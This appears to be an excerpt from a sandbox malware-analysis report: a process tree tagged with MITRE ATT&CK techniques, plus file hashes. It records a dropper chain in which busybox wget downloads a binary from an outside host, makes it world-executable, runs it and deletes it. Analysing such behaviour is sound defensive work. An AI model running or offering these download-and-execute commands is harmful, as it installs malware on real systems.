/bin/busybox/bin/busybox wget http://conn.masjesu.zip/bins/cf6YUEdIReE7Wn7lq4kVzqa5bvolwgf7T62⤵
- System Network Configuration Discovery
PID:1006
-
-
/bin/chmodchmod 777 cf6YUEdIReE7Wn7lq4kVzqa5bvolwgf7T62⤵
- File and Directory Permissions Modification
PID:1007
-
-
/tmp/cf6YUEdIReE7Wn7lq4kVzqa5bvolwgf7T6./cf6YUEdIReE7Wn7lq4kVzqa5bvolwgf7T62⤵
- Executes dropped EXE
PID:1008
-
-
/bin/rmrm cf6YUEdIReE7Wn7lq4kVzqa5bvolwgf7T62⤵PID:1009
-
Network
MITRE ATT&CK Enterprise v15
Downloads
-
Filesize
153B
MD5 998368d7c95ea4293237f2320546e440
SHA1 30dfd2d3bb8a7e3241bd7792e90a98ebb70be3a4
SHA256 533a1ca5d6595793725bca7641d9461a0f00dd1732dded3e4281196f5dd21736
SHA512 648c4720a85dbf834be1ba00f0e1b4167cc670fe15896efb00a77fb6e0c225a13aae3da10d85fa6e7f726420d9bb3c20c43466e02296d44153c127b7160e0b97